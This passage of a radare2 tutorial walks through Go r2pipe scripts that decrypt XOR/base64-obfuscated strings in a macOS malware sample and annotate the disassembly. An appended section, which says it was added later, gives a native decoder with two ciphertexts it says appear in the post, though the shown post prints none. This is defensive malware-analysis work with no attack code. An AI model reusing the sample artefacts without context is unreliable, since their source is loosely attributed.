We’ll call the Go program “decode.go”, and the first part of it requires importing the r2pipe package from GitHub.

package main

import (
	"fmt"

	"github.com/radareorg/r2pipe-go"
)

// Declare r2p as a global. With an empty path, NewPipe attaches to the
// r2 session that launched this program via #!pipe instead of spawning one.
var r2p, _ = r2pipe.NewPipe("")

// check aborts on any error; fine for a throwaway reversing script.
func check(err error) {
	if err != nil {
		panic(err)
	}
}

After the imports, we declare a global variable r2p, which provides a pipe to the r2 instance when the program is launched from within an r2 session (an empty path tells NewPipe to attach to the parent r2 rather than spawn a new one). This global lets us send commands to the r2 session and read back their output. We also implement a generic error-checking function for use throughout the code.

Next, we’ll implement a decrypt function. We could (and probably should) write a native version of this, but since we already have a decrypt function using rahash2 above, we’ll reuse that. This will also allow us to see and solve some other common challenges we might face in other scenarios.

func decryptStrAtLoc(loc string, key string) {
	bytes := fmt.Sprintf("ps @ %s", loc) // [1] print the string at loc
	str, err := r2p.Cmd(bytes)
	check(err)
	// [2] shell out to rxorb; the decrypted text lands in a temp file
	decodeCmd := fmt.Sprintf("!rxorb -b %s %s > /tmp/rxorb.txt", key, str)
	_, err = r2p.Cmd(decodeCmd)
	check(err)
}

The decryptStrAtLoc() function does most of the work in our program. As parameters, it takes an address and the XOR key. We’ve chosen not to return the decrypted string to the caller but instead consume it within the function. We’ll see why shortly.

For each command we want to pass to the r2 session, we first format the command as a string, then pass the command to r2p. Thus, [1] formats a command that returns the bytes at the current address as a string. At [2], we format a command that decodes the string by passing it to the rxorb utility we wrote earlier.

As r2pipe’s Go implementation doesn’t support easy capture of stderr and stdout, we write this to a temporary file, which we’ll consume in the next part of the code. Had we chosen to implement the XOR decryption natively in our code, we could have avoided that, but seeing how to deal with stdout when using r2pipe and Go is a useful exercise for other scripts.

func writeCommentAtLoc(loc string) {
	// CCu sets a unique comment at loc; the backticks make r2 run the
	// shell command and substitute its output as the comment text
	readCmd := fmt.Sprintf("CCu `!cat -v /tmp/rxorb.txt | sed 's/\\(.*\\)/\"\\1\"/g'` @ %s", loc)
	_, err := r2p.Cmd(readCmd)
	check(err)
}

Our decoded string is now sitting in a file in /tmp. In the function above we do two things with one command: we read the string back and we write it out as a comment at the disassembly address in the file under analysis. The sed code is a workaround for wrapping the string in quotes so that any special characters in the string do not get interpreted by the r2 shell when we pass it back.

func printCommentAtLoc(loc string) {
	pdCmd := fmt.Sprintf("pd 1 @ %s", loc) // [3] one line of disassembly at loc
	pdStr, err := r2p.Cmd(pdCmd)
	check(err)
	fmt.Println(pdStr)
}

We next implement a function that will print out the disassembly along with the commented string to the r2 prompt. At [3], the “pd 1” command tells r2 to print one line of disassembly from the given address.

Finally, we implement our main() function that will call all this code as well as handle cleaning up the temporary file now that we’re done.

func main() {
	defer r2p.Close()

	key := "0x30"
	addr, err := r2p.Cmd("s") // [4] 's' with no argument returns the current address
	check(err)
	decryptStrAtLoc(addr, key)
	writeCommentAtLoc(addr)
	printCommentAtLoc(addr)

	// clean up the temp file
	if _, err := r2p.Cmd("!rm /tmp/rxorb.txt"); err != nil {
		fmt.Println(err)
	}
}

Note that at [4], due to the simplicity of the command, we just supplied the command directly to r2p.Cmd rather than format a separate string. The entire script can be found here.

Using the Script

To use the script, build the decode.go program and note the output path. Open an r2 session with the target binary and at the prompt type:

#!pipe /usr/local/bin/godec/decode # change the path to suit

If you hit return now, you’ll likely see an error and then some disassembly.

The script returns an error from sed

That’s because we executed the script while located at an address that does not contain a string to consume. Let’s find an encrypted string and try again. The r2 command izz~== will output any strings in the binary that contain “==”, a common padding for base64-encoded strings (padding can also be a single “=” or absent altogether, so this filter is a quick heuristic rather than a complete list).

Executing izz~== at the r2 prompt

Let’s seek to location 0x100016bdb to test our decryption program.

We can see that our decoder has appended a comment containing the decrypted string, which looks like the beginning of a LaunchAgent or LaunchDaemon plist. Great! Let’s try again, this time feeding it all the strings that contain “==” in one go. Try this:

#!pipe /usr/local/bin/godec/decode @@=`izz~==[2]`

Here’s an example of the output:

At this point, since the #!pipe command is awkward to remember and type out every time, you might want to create an alias and/or macro for that.

$dec=#!pipe /usr/local/bin/godec/decode
(script x;  #!pipe $0)

The $dec alias allows us to call this particular script easily, while the script macro allows us to pass in any script path as an argument to the #!pipe command.

Note that we didn’t decode all encrypted strings in the binary. We could iterate over all strings (including non-encrypted ones) with something like $dec @@=`izz~cstring[2]`, but that will lead to errors on every string that isn’t base64. The right way to approach this would be to add code to our program that determines whether the string at the current address is valid base64 before trying to decode it. We’ll leave that as an exercise for the reader.

Our script could also do with some other improvements: passing the key as an argument would make it more reusable, and there are many points where we lazily use r2 to shell out rather than using Go’s own os package, but for now this simple script handles the job it was intended for and is easy to repurpose or build on.
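The three improvements mentioned in this post, a native decrypt routine instead of shelling out to rxorb, a check that a string really is base64 before touching it, and a key that is passed in rather than hard coded, fit comfortably in a few dozen lines of standard-library Go. The program below is an added example, not code from the original post or from the r2pipe project. The two ciphertexts are the ones shown in this post; the izz listing around them, its addresses and the two plain strings are constructed for the example, and the parser assumes the izz column order nth, paddr, vaddr, len, size, section, type, string. Because it tests base64 validity instead of grepping for “==”, it also picks up ciphertexts with a single “=” of padding or none at all, which the izz~==[2] address list misses.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"sort"
	"strconv"
	"strings"
	"unicode"
)

// Fairytale's hard coded single-byte XOR key, as identified in the post.
const fairytaleKey byte = 0x30

// decodeXorB64 reverses the OSX.Fairytale scheme natively: base64-decode the
// ciphertext, then XOR every byte with a one-byte key. This replaces the
// "!rxorb -b key str > /tmp/rxorb.txt" shell-out and the temp file.
func decodeXorB64(enc string, key byte) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(enc))
	if err != nil {
		return "", err
	}
	out := make([]byte, len(raw))
	for i, b := range raw {
		out[i] = b ^ key
	}
	return string(out), nil
}

// printableASCII is the plausibility heuristic: a correctly decrypted
// Fairytale string is a path, URL or format string, so every byte should be
// printable 7-bit ASCII (tab and newline allowed). Bytes >= 0x80 become
// U+FFFD when ranged over as a string and fail the MaxASCII check.
func printableASCII(s string) bool {
	if s == "" {
		return false
	}
	for _, r := range s {
		if r > unicode.MaxASCII {
			return false
		}
		if !unicode.IsPrint(r) && r != '\n' && r != '\t' {
			return false
		}
	}
	return true
}

// tryDecrypt answers the "is this really an encrypted string?" question the
// post leaves as an exercise: the candidate must be well-formed standard
// base64 (length a multiple of 4) and must decrypt to printable text.
// ok == false means "leave this string alone".
func tryDecrypt(candidate string, key byte) (plain string, ok bool) {
	c := strings.TrimSpace(candidate)
	if len(c) < 4 || len(c)%4 != 0 {
		return "", false
	}
	plain, err := decodeXorB64(c, key)
	if err != nil || !printableASCII(plain) {
		return "", false
	}
	return plain, true
}

// decryptIzzOutput takes the text of r2's `izz` command (assumed columns:
// nth paddr vaddr len size section type string) and returns vaddr -> plaintext
// for every string that passes tryDecrypt. Header and separator lines are
// skipped because their first field is not a number.
func decryptIzzOutput(izz string, key byte) map[uint64]string {
	found := make(map[uint64]string)
	for _, line := range strings.Split(izz, "\n") {
		f := strings.Fields(line)
		if len(f) < 8 {
			continue
		}
		if _, err := strconv.Atoi(f[0]); err != nil {
			continue
		}
		vaddr, err := strconv.ParseUint(strings.TrimPrefix(f[2], "0x"), 16, 64)
		if err != nil {
			continue
		}
		s := strings.Join(f[7:], " ") // the string column may contain spaces
		if plain, ok := tryDecrypt(s, key); ok {
			found[vaddr] = plain
		}
	}
	return found
}

// Constructed sample in the shape of `izz` output. The two base64 strings are
// the ones shown in the post; addresses and the two plain strings are made up.
const sampleIzz = `[Strings]
nth paddr      vaddr       len size section           type  string
――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00001000 0x100001000 44  45   .__TEXT.__cstring ascii FXAffFlSQlFCSR98UUVeU1hxV1VeREMfFXAeQFxZQ0Q=
1   0x00001030 0x100001030 20  21   .__TEXT.__cstring ascii H1JZXh9cUUVeU1hTRFw=
2   0x00001050 0x100001050 15  16   .__TEXT.__cstring ascii /usr/bin/python
3   0x00001060 0x100001060 4   5    .__TEXT.__cstring ascii ABCD
`

func main() {
	res := decryptIzzOutput(sampleIzz, fairytaleKey)
	addrs := make([]uint64, 0, len(res))
	for a := range res {
		addrs = append(addrs, a)
	}
	sort.Slice(addrs, func(i, j int) bool { return addrs[i] < addrs[j] })
	for _, a := range addrs {
		// Same shape as the CCu comment the r2pipe script writes.
		fmt.Printf("CCu %q @ 0x%x\n", res[a], a)
	}
}
```

In an r2pipe version of this, the izz text would come from r2p.Cmd("izz") and each result would go back as a CCu command, so the whole binary is commented in one pass with no temp file and no dependence on a particular padding pattern. Note that the printable-text check is a heuristic: a string that is valid base64 and happens to decrypt to printable ASCII with the wrong key (or no encryption at all) will still be accepted, so eyeball the results.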

Running a Script Without an Interactive radare2 Prompt

Sometimes you just need to run a script and get the results without an interactive r2 prompt. You can tell r2 to execute a script file with the -i flag, which runs it after the binary has been loaded, or with -I, which runs it before the target is loaded (useful for setting eval variables that affect loading). The -q option tells r2 to quit after running the script. For an analysis script you normally want -i:

r2 -qi <script file> <binary>

You can also do the same thing with commands, aliases and macros directly without using a script, using the -c option. For example, this will print out the result of the meta macro without leaving you in an r2 session:

r2 -qc ".(meta)" /bin/ls

Batch Processing Files with a radare2 Script

If you want to process a number of files without having to start an r2 session for each one, you can pass the file path to your script as an argument when you call r2pipe as follows:

package main

import (
	"fmt"
	"os"

	"github.com/radareorg/r2pipe-go"
)

func check(err error) {
	if err != nil {
		panic(err)
	}
}

func main() {
	if len(os.Args) != 2 {
		fmt.Println("Usage: provide the path to one binary.")
		os.Exit(1)
	}

	argPath := os.Args[1]
	r2p, err := r2pipe.NewPipe(argPath) // spawns r2 on the given file for us
	check(err)
	defer r2p.Close()
	_, err = r2p.Cmd("aaa") // run analysis
	check(err)

	// do your stuff
	// write results to file or stdout
}

You can now process all files in a folder from the command line with something like:

% for i in ./*; do my_r2pipe_script "$i"; done

Conclusion

In this post, we’ve learned a number of useful skills. We’ve seen how to automate tasks like grabbing disassembly, adding comments, and decoding strings, and we have navigated some of the complexities of dealing with stdout when using Go to drive r2pipe.

We’ve looked at how to pass file paths as arguments and how to run scripts, commands and macros without opening an interactive radare2 session. With a good understanding of the r2 commands explored throughout this series, you should now be able to readily adapt these skills to other automation tasks.

References and Further Reading

R2pipe – The Official Radare2 Book
Radare2-r2pipe-api repository
Radare2 Python Scripting
Automating RE Using r2pipe
Decrypting Mirai configuration With radare2
Running r2Pipe Python in batch
Scripting r2 with Pipes
